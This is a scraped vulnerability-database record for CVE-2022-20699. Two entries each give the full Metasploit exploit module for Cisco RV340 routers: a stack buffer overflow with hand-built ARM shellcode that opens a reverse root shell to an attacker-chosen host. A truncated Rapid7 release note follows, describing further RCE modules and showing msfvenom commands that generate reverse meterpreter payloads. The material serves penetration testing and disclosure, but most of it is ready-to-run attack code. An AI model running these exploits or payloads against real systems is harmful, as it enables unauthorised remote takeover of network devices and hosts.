"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "zdt", "title": "Cisco RV340 SSL VPN Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-05-12T00:00:00", "id": "1337DAY-ID-37729", "href": "https://0day.today/exploit/description/37729", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cisco RV340 SSL VPN Unauthenticated Remote Code Execution',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Cisco RV series routers SSL VPN\n functionality. The default SSL VPN configuration is exploitable, with no authentication\n required and works over the Internet!\n The stack is executable and no ASLR is in place, which makes exploitation easier.\n Successful execution of this module results in a reverse root shell. A custom payload is\n used as Metasploit does not have ARMLE null free shellcode.\n This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon\n 2022. For more information check the referenced advisory.\n This module has been tested in firmware versions 1.0.03.15 and above and works with around\n 65% reliability. The service restarts automatically so you can keep trying until you pwn it.\n Only the RV340 router was tested, but other RV series routers should work out of the box.\n },\n 'Author' => [\n 'Pedro Ribeiro <[email\u00a0protected]>', # Vulnerability discovery and Metasploit module\n 'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'References' => [\n ['CVE', '2022-20699'],\n ['URL', 'https://www.youtube.com/watch?v=O1uK_b1Tmts'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md'],\n ['URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md'],\n ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html'],\n ],\n 'Arch' => ARCH_ARMLE,\n # We actually use our own shellcode because Metasploit doesn't have ARM encoders!\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },\n 'Targets' => [\n [\n 'Cisco RV340 Firmware Version <= 1.0.03.24',\n {\n # Shellcode location on stack (rwx stack, seriously Cisco...)\n # The same for all vulnerable firmware versions: 0x704aed98 (+ 1 for thumb)\n #\n # NOTE: this is the shellcode location about 65% of the time. The rest is at\n # The remaining 35% will land at 0x704f6d98, causing this sploit will fail.\n # There's no way to guess it, but the service will restart again, so let's stick\n # with the most common stack address.\n 'Shellcode' => \"\\x99\\xed\\x4a\\x70\"\n }\n ],\n ],\n 'DisclosureDate' => '2022-02-02',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => CRASH_SERVICE_RESTARTS,\n # repeatable... but only works 65% of the time, see comments above\n 'Reliability' => REPEATABLE_SESSION,\n 'SideEffects' => nil\n }\n )\n )\n register_options(\n [\n Opt::RPORT(8443),\n OptBool.new('SSL', [true, 'Use SSL', true])\n ]\n )\n end\n\n def check\n # This should return a string like:\n # \"The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server.\" (plus another phrase)\n res = send_request_cgi({ 'uri' => '/login.html' })\n if res && res.code == 200 && res.body.include?('The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server')\n Exploit::CheckCode::Detected\n else\n Exploit::CheckCode::Unknown\n end\n end\n\n def hex_to_bin(int)\n hex = int.to_s(16)\n if (hex.length == 1) || (hex.length == 3)\n hex = '0' + hex\n end\n hex.scan(/../).map { |x| x.hex.chr }.join\n end\n\n def prep_shelly\n # We need to roll our own shellcode, as Metasploit doesn't have encoders for ARMLE.\n # A null free shellcode is needed, as this memory corruption is done through `strcat()`\n #\n # SHELLCODE_START:\n # // Original shellcode from Azeria's blog\n # // Expanded and Improved by the Flashback Team\n # .global _start\n # _start:\n # .THUMB\n # // socket(2, 1, 0)\n # mov r0, #2\n # mov r1, #1\n # sub r2, r2\n # mov r7, #200\n # add r7, #81 // r7 = 281 (socket)\n # svc #1 // r0 = resultant sockfd\n # mov r4, r0 // save sockfd in r4\n #\n # // connect(r0, &sockaddr, 16)\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #1] // write 0 for AF_INET\n # mov r2, #16\n # add r7, #2 // r7 = 283 (connect)\n # svc #1\n #\n # // dup2(sockfd, 0)\n # mov r7, #63 // r7 = 63 (dup2)\n # mov r0, r4 // r4 is the saved sockfd\n # sub r1, r1 // r1 = 0 (stdin)\n # svc #1\n # // dup2(sockfd, 1)\n # mov r0, r4 // r4 is the saved sockfd\n # mov r1, #1 // r1 = 1 (stdout)\n # svc #1\n # // dup2(sockfd, 2)\n # mov r0, r4 // r4 is the saved sockfd\n # mov r1, #2 // r1 = 2 (stderr)\n # svc #1\n #\n # // execve(\"/bin/sh\", 0, 0)\n # adr r0, binsh\n # sub r2, r2\n # sub r1, r1\n # strb r2, [r0, #7]\n # push {r0, r2}\n # mov r1, sp\n # cpy r2, r1\n # mov r7, #11 // r7 = 11 (execve)\n # svc #1\n #\n # eor r7, r7, r7\n #\n # struct:\n # .ascii \"\\x02\\xff\" // AF_INET 0xff will be NULLed\n # .ascii \"\\x11\\x5d\" // port number 4445\n # .byte 5,5,5,1 // IP Address\n # binsh:\n # .ascii \"/bin/shX\"\n # SHELLCODE_END\n #\n # Since we need to be null free, we have a very specific corner case, for addresses:\n # X.0.Y.Z\n # X.Y.0.Z\n # X.Y.Z.0\n # X.0.0.Y\n # X.Y.0.0\n # X.0.Y.0\n # X.0.0.0\n # These will contain a null byte for the each zero in the address.\n #\n # To fix this we add additional instructions to the shellcode and replace the null byte(s).\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #5] // write 0 for X.0.Y.Z (second octet)\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #6] // write 0 for X.Y.0.Z (third octet)\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #7] // write 0 for X.Y.Z.0 (last octet)\n #\n\n # The following is used to convert LHOST and LPORT for shellcode inclusion\n lport_h = hex_to_bin(lport)\n lhost_h = ''\n jump = 0xc\n datastore['LHOST'].split('.').each do |n|\n octet = hex_to_bin(n.to_i)\n if octet == \"\\x00\"\n # Why we do this? Check comments below my fren\n jump += 1\n end\n lhost_h += octet\n end\n lhost_h = lhost_h.force_encoding('binary')\n\n # As part of the shellcode, we need to do:\n # adr r1, struct // pointer to address, port\n # strb r2, [r1, #1] // write 0 for AF_INET\n #\n # In order to do the \"adr\", we need to know where \"struct\" is. On an unmodified\n # shellcode, this is \"\\x0c\\xa1\\x4a\\x70\".\n # But if we have one or more null bytes in the LHOST, we need to add more instructions.\n # This means the \"\\x0c\", the distance from $pc to \"struct, is going to be either\n # \"\\x0d, \"\\x0e\" or \"\\x0f\".\n # Long story short, this distance is the jump variable, and we need to calculate it\n # properly the more instructions we add.\n #\n # This is our jump, now calculated with the additional (or not) instructions:\n ins = hex_to_bin(jump) + \"\\xa1\\x4a\\x70\"\n jump -= 1\n\n # And now we calculate all the null bytes we have, replace them with \\xff and add\n # the proper jump:\n for i in 1..3 do\n next unless lhost_h[i] == \"\\x00\"\n\n ins_add = ''\n lhost_h[i] = \"\\xff\"\n if i == 1\n # strb r2, [r1, #5] // write 0 for X.0.Y.Z (second octet)\n ins_add = \"\\x4a\\x71\"\n elsif i == 2\n # strb r2, [r1, #6] // write 0 for X.Y.0.Z (third octet)\n ins_add = \"\\x8a\\x71\"\n elsif i == 3\n # strb r2, [r1, #7] // write 0 for X.Y.Z.0 (last octet)\n ins_add = \"\\xca\\x71\"\n end\n ins += hex_to_bin(jump) + \"\\xa1\" + ins_add\n jump -= 1\n end\n ins = ins.force_encoding('binary')\n\n shellcode = \"\\x02\\x20\\x01\\x21\\x92\\x1a\\xc8\\x27\\x51\\x37\\x01\\xdf\\x04\\x1c\" + ins +\n \"\\x10\\x22\\x02\\x37\\x01\\xdf\\x3f\\x27\\x20\\x1c\\x49\\x1a\\x01\\xdf\\x20\\x1c\\x01\\x21\" \\\n \"\\x01\\xdf\\x20\\x1c\\x02\\x21\\x01\\xdf\\x06\\xa0\\x92\\x1a\\x49\\x1a\\xc2\\x71\\x05\\xb4\" \\\n \"\\x69\\x46\\x0a\\x46\\x0b\\x27\\x01\\xdf\\x7f\\x40\\x02\\xff\" + lport_h + lhost_h +\n \"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\"\n shelly = shellcode + rand_text_alphanumeric(16400 - shellcode.length) + target['Shellcode']\n shelly\n end\n\n def sock_get(app_host, app_port)\n begin\n ctx = { 'Msf' => framework, 'MsfExploit' => self }\n sock = Rex::Socket.create_tcp(\n { 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 }\n )\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n sock.close if sock\n end\n if sock.nil?\n fail_with(Failure::Unknown, 'Failed to connect to the chosen application')\n end\n\n # also need to add support for old ciphers\n ctx = OpenSSL::SSL::SSLContext.new\n ctx.min_version = OpenSSL::SSL::SSL3_VERSION\n ctx.security_level = 0\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n s = OpenSSL::SSL::SSLSocket.new(sock, ctx)\n s.sync_close = true\n s.connect\n return s\n end\n\n def exploit\n print_status(\"#{peer} - Pwning #{target.name}\")\n payload = prep_shelly\n begin\n sock = sock_get(rhost, rport)\n # With the base request, our shellcode will be about 0x12a from $sp when we take control.\n #\n # But we noticed that by adding more filler in the request we can have better reliability.\n # So let's use 0x86 as filler and dump the filler in the URL! This number is arbitrary and\n # can be increased / decreased, but we find 0x86 works well.\n # (this means our shellcode address in the target definition above is $sp + 0x12a + 0x86)\n #\n # It would be good to add some valid headers with semi random data for proper evasion :D\n http = 'POST /' + rand_text_alphanumeric(0x86) + \" HTTP/1.1\\r\\nContent-Length: 16404\\r\\n\\r\\n\"\n\n sock.write(http)\n sock.write(payload)\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the router\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37729", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-05-11T17:26:30", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "packetstorm", "title": "Cisco RV340 SSL VPN Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-05-11T00:00:00", "id": "PACKETSTORM:167113", "href": "https://packetstormsecurity.com/files/167113/Cisco-RV340-SSL-VPN-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco RV340 SSL VPN Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in the Cisco RV series routers SSL VPN \nfunctionality. The default SSL VPN configuration is exploitable, with no authentication \nrequired and works over the Internet! \nThe stack is executable and no ASLR is in place, which makes exploitation easier. \nSuccessful execution of this module results in a reverse root shell. A custom payload is \nused as Metasploit does not have ARMLE null free shellcode. \nThis vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon \n2022. For more information check the referenced advisory. \nThis module has been tested in firmware versions 1.0.03.15 and above and works with around \n65% reliability. The service restarts automatically so you can keep trying until you pwn it. \nOnly the RV340 router was tested, but other RV series routers should work out of the box. \n}, \n'Author' => [ \n'Pedro Ribeiro <pedrib@gmail.com>', # Vulnerability discovery and Metasploit module \n'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'References' => [ \n['CVE', '2022-20699'], \n['URL', 'https://www.youtube.com/watch?v=O1uK_b1Tmts'], \n['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md'], \n['URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md'], \n['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html'], \n], \n'Arch' => ARCH_ARMLE, \n# We actually use our own shellcode because Metasploit doesn't have ARM encoders! \n'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' }, \n'Targets' => [ \n[ \n'Cisco RV340 Firmware Version <= 1.0.03.24', \n{ \n# Shellcode location on stack (rwx stack, seriously Cisco...) \n# The same for all vulnerable firmware versions: 0x704aed98 (+ 1 for thumb) \n# \n# NOTE: this is the shellcode location about 65% of the time. The rest is at \n# The remaining 35% will land at 0x704f6d98, causing this sploit will fail. \n# There's no way to guess it, but the service will restart again, so let's stick \n# with the most common stack address. \n'Shellcode' => \"\\x99\\xed\\x4a\\x70\" \n} \n], \n], \n'DisclosureDate' => '2022-02-02', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => CRASH_SERVICE_RESTARTS, \n# repeatable... but only works 65% of the time, see comments above \n'Reliability' => REPEATABLE_SESSION, \n'SideEffects' => nil \n} \n) \n) \nregister_options( \n[ \nOpt::RPORT(8443), \nOptBool.new('SSL', [true, 'Use SSL', true]) \n] \n) \nend \n \ndef check \n# This should return a string like: \n# \"The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server.\" (plus another phrase) \nres = send_request_cgi({ 'uri' => '/login.html' }) \nif res && res.code == 200 && res.body.include?('The Cisco AnyConnect VPN Client is required to connect to the SSLVPN server') \nExploit::CheckCode::Detected \nelse \nExploit::CheckCode::Unknown \nend \nend \n \ndef hex_to_bin(int) \nhex = int.to_s(16) \nif (hex.length == 1) || (hex.length == 3) \nhex = '0' + hex \nend \nhex.scan(/../).map { |x| x.hex.chr }.join \nend \n \ndef prep_shelly \n# We need to roll our own shellcode, as Metasploit doesn't have encoders for ARMLE. \n# A null free shellcode is needed, as this memory corruption is done through `strcat()` \n# \n# SHELLCODE_START: \n# // Original shellcode from Azeria's blog \n# // Expanded and Improved by the Flashback Team \n# .global _start \n# _start: \n# .THUMB \n# // socket(2, 1, 0) \n# mov r0, #2 \n# mov r1, #1 \n# sub r2, r2 \n# mov r7, #200 \n# add r7, #81 // r7 = 281 (socket) \n# svc #1 // r0 = resultant sockfd \n# mov r4, r0 // save sockfd in r4 \n# \n# // connect(r0, &sockaddr, 16) \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #1] // write 0 for AF_INET \n# mov r2, #16 \n# add r7, #2 // r7 = 283 (connect) \n# svc #1 \n# \n# // dup2(sockfd, 0) \n# mov r7, #63 // r7 = 63 (dup2) \n# mov r0, r4 // r4 is the saved sockfd \n# sub r1, r1 // r1 = 0 (stdin) \n# svc #1 \n# // dup2(sockfd, 1) \n# mov r0, r4 // r4 is the saved sockfd \n# mov r1, #1 // r1 = 1 (stdout) \n# svc #1 \n# // dup2(sockfd, 2) \n# mov r0, r4 // r4 is the saved sockfd \n# mov r1, #2 // r1 = 2 (stderr) \n# svc #1 \n# \n# // execve(\"/bin/sh\", 0, 0) \n# adr r0, binsh \n# sub r2, r2 \n# sub r1, r1 \n# strb r2, [r0, #7] \n# push {r0, r2} \n# mov r1, sp \n# cpy r2, r1 \n# mov r7, #11 // r7 = 11 (execve) \n# svc #1 \n# \n# eor r7, r7, r7 \n# \n# struct: \n# .ascii \"\\x02\\xff\" // AF_INET 0xff will be NULLed \n# .ascii \"\\x11\\x5d\" // port number 4445 \n# .byte 5,5,5,1 // IP Address \n# binsh: \n# .ascii \"/bin/shX\" \n# SHELLCODE_END \n# \n# Since we need to be null free, we have a very specific corner case, for addresses: \n# X.0.Y.Z \n# X.Y.0.Z \n# X.Y.Z.0 \n# X.0.0.Y \n# X.Y.0.0 \n# X.0.Y.0 \n# X.0.0.0 \n# These will contain a null byte for the each zero in the address. \n# \n# To fix this we add additional instructions to the shellcode and replace the null byte(s). \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #5] // write 0 for X.0.Y.Z (second octet) \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #6] // write 0 for X.Y.0.Z (third octet) \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #7] // write 0 for X.Y.Z.0 (last octet) \n# \n \n# The following is used to convert LHOST and LPORT for shellcode inclusion \nlport_h = hex_to_bin(lport) \nlhost_h = '' \njump = 0xc \ndatastore['LHOST'].split('.').each do |n| \noctet = hex_to_bin(n.to_i) \nif octet == \"\\x00\" \n# Why we do this? Check comments below my fren \njump += 1 \nend \nlhost_h += octet \nend \nlhost_h = lhost_h.force_encoding('binary') \n \n# As part of the shellcode, we need to do: \n# adr r1, struct // pointer to address, port \n# strb r2, [r1, #1] // write 0 for AF_INET \n# \n# In order to do the \"adr\", we need to know where \"struct\" is. On an unmodified \n# shellcode, this is \"\\x0c\\xa1\\x4a\\x70\". \n# But if we have one or more null bytes in the LHOST, we need to add more instructions. \n# This means the \"\\x0c\", the distance from $pc to \"struct, is going to be either \n# \"\\x0d, \"\\x0e\" or \"\\x0f\". \n# Long story short, this distance is the jump variable, and we need to calculate it \n# properly the more instructions we add. \n# \n# This is our jump, now calculated with the additional (or not) instructions: \nins = hex_to_bin(jump) + \"\\xa1\\x4a\\x70\" \njump -= 1 \n \n# And now we calculate all the null bytes we have, replace them with \\xff and add \n# the proper jump: \nfor i in 1..3 do \nnext unless lhost_h[i] == \"\\x00\" \n \nins_add = '' \nlhost_h[i] = \"\\xff\" \nif i == 1 \n# strb r2, [r1, #5] // write 0 for X.0.Y.Z (second octet) \nins_add = \"\\x4a\\x71\" \nelsif i == 2 \n# strb r2, [r1, #6] // write 0 for X.Y.0.Z (third octet) \nins_add = \"\\x8a\\x71\" \nelsif i == 3 \n# strb r2, [r1, #7] // write 0 for X.Y.Z.0 (last octet) \nins_add = \"\\xca\\x71\" \nend \nins += hex_to_bin(jump) + \"\\xa1\" + ins_add \njump -= 1 \nend \nins = ins.force_encoding('binary') \n \nshellcode = \"\\x02\\x20\\x01\\x21\\x92\\x1a\\xc8\\x27\\x51\\x37\\x01\\xdf\\x04\\x1c\" + ins + \n\"\\x10\\x22\\x02\\x37\\x01\\xdf\\x3f\\x27\\x20\\x1c\\x49\\x1a\\x01\\xdf\\x20\\x1c\\x01\\x21\" \\ \n\"\\x01\\xdf\\x20\\x1c\\x02\\x21\\x01\\xdf\\x06\\xa0\\x92\\x1a\\x49\\x1a\\xc2\\x71\\x05\\xb4\" \\ \n\"\\x69\\x46\\x0a\\x46\\x0b\\x27\\x01\\xdf\\x7f\\x40\\x02\\xff\" + lport_h + lhost_h + \n\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\" \nshelly = shellcode + rand_text_alphanumeric(16400 - shellcode.length) + target['Shellcode'] \nshelly \nend \n \ndef sock_get(app_host, app_port) \nbegin \nctx = { 'Msf' => framework, 'MsfExploit' => self } \nsock = Rex::Socket.create_tcp( \n{ 'PeerHost' => app_host, 'PeerPort' => app_port, 'Context' => ctx, 'Timeout' => 10 } \n) \nrescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError \nsock.close if sock \nend \nif sock.nil? \nfail_with(Failure::Unknown, 'Failed to connect to the chosen application') \nend \n \n# also need to add support for old ciphers \nctx = OpenSSL::SSL::SSLContext.new \nctx.min_version = OpenSSL::SSL::SSL3_VERSION \nctx.security_level = 0 \nctx.verify_mode = OpenSSL::SSL::VERIFY_NONE \ns = OpenSSL::SSL::SSLSocket.new(sock, ctx) \ns.sync_close = true \ns.connect \nreturn s \nend \n \ndef exploit \nprint_status(\"#{peer} - Pwning #{target.name}\") \npayload = prep_shelly \nbegin \nsock = sock_get(rhost, rport) \n# With the base request, our shellcode will be about 0x12a from $sp when we take control. \n# \n# But we noticed that by adding more filler in the request we can have better reliability. \n# So let's use 0x86 as filler and dump the filler in the URL! This number is arbitrary and \n# can be increased / decreased, but we find 0x86 works well. \n# (this means our shellcode address in the target definition above is $sp + 0x12a + 0x86) \n# \n# It would be good to add some valid headers with semi random data for proper evasion :D \nhttp = 'POST /' + rand_text_alphanumeric(0x86) + \" HTTP/1.1\\r\\nContent-Length: 16404\\r\\n\\r\\n\" \n \nsock.write(http) \nsock.write(payload) \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the router\") \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167113/cisco_rv340_sslvpn.rb.txt"}], "rapid7blog": [{"lastseen": "2022-05-13T17:31:10", "description": "## Spring4Shell module\n\n\n\nCommunity contributor [vleminator](<https://github.com/vleminator>) added [a new module](<https://github.com/rapid7/metasploit-framework/pull/16423>) which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>)\u2014more commonly known as &quot;Spring4Shell.&quot; [Depending on its deployment configuration](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965/rapid7-analysis?referrer=blog>), Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.\n\n## F5 BIG-IP iControl RCE via REST Authentication Bypass module\n\nIn addition, we have [a new module](<https://github.com/rapid7/metasploit-framework/pull/16549>) that targets F5 iControl and exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>), from contributor [heyder](<https://github.com/heyder>). This vulnerability allows attackers to bypass iControl's REST authentication on [affected versions](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis?referrer=blog>) and achieve unauthenticated remote code execution as `root` via the `/mgmt/tm/util/bash` endpoint.\n\n## Cisco RV340 SSL VPN RCE module\n\nThe last of the new RCE modules this week\u2014community contributor [pedrib](<https://github.com/pedrib>) added [a Cisco RV340 SSL VPN module](<https://github.com/rapid7/metasploit-framework/pull/16169>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>). This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.\n\n## First Class PowerShell Command Payloads\n\nMetasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new `cmd/windows/powershell*` payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.\n\nSince these are new payload modules, they can also be generated directly using MSFVenom:\n \n \n ./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128\n \n\nThis is similar to using one of the `psh-` formatters with the existing `-f` option. However, because it\u2019s a payload module, the additional [Powershell specific options](<https://github.com/rapid7/metasploit-framework/blob/93a7ae26a1e85f82de8647460a0c245bf95e6b00/lib/msf/core/exploit/powershell.rb#L10>) are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting `Powershell::encode_final_payload=true`.\n\n## New module content (4)\n\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>) \\- A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [Cisco RV340 SSL VPN RCE](<https://github.com/rapid7/metasploit-framework/pull/16169>) from [pedrib](<https://github.com/pedrib>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>) \\- A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.\n * [Spring Framework Class property RCE (Spring4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16423>) by [vleminator](<https://github.com/vleminator>), which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>) \\- This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a `war` file, though it may be possible to bypass these limitations later.\n * [Powershell Command Adapter](<https://github.com/rapid7/metasploit-framework/pull/16548>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.\n\n## Enhancements and features (4)\n\n * [#16529](<https://github.com/rapid7/metasploit-framework/pull/16529>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:\n \n \n use osx/x64/meterpreter_reverse_tcp\n generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'\n to_handler\n \n\n * [#16538](<https://github.com/rapid7/metasploit-framework/pull/16538>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.\n * [#16551](<https://github.com/rapid7/metasploit-framework/pull/16551>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.\n * [#16553](<https://github.com/rapid7/metasploit-framework/pull/16553>) from [mauvehed](<https://github.com/mauvehed>) \\- This updates Metasploit's `.github/SECURITY.md` file with the latest steps to follow when raising security issues with Rapid7's open source projects.\n\n## Bugs fixed (8)\n\n * [#16485](<https://github.com/rapid7/metasploit-framework/pull/16485>) from [jeffmcjunkin](<https://github.com/jeffmcjunkin>) \\- This updates the version check for the `exploit/windows/local/s4u_persistence` module to allow it to run on later Windows versions.\n * [#16491](<https://github.com/rapid7/metasploit-framework/pull/16491>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.\n * [#16531](<https://github.com/rapid7/metasploit-framework/pull/16531>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in various pihole modules when login authentication is required.\n * [#16533](<https://github.com/rapid7/metasploit-framework/pull/16533>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with `-w 32` or `-w 64` \\- previously these flag values were unintentionally ignored.\n * [#16540](<https://github.com/rapid7/metasploit-framework/pull/16540>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.\n * 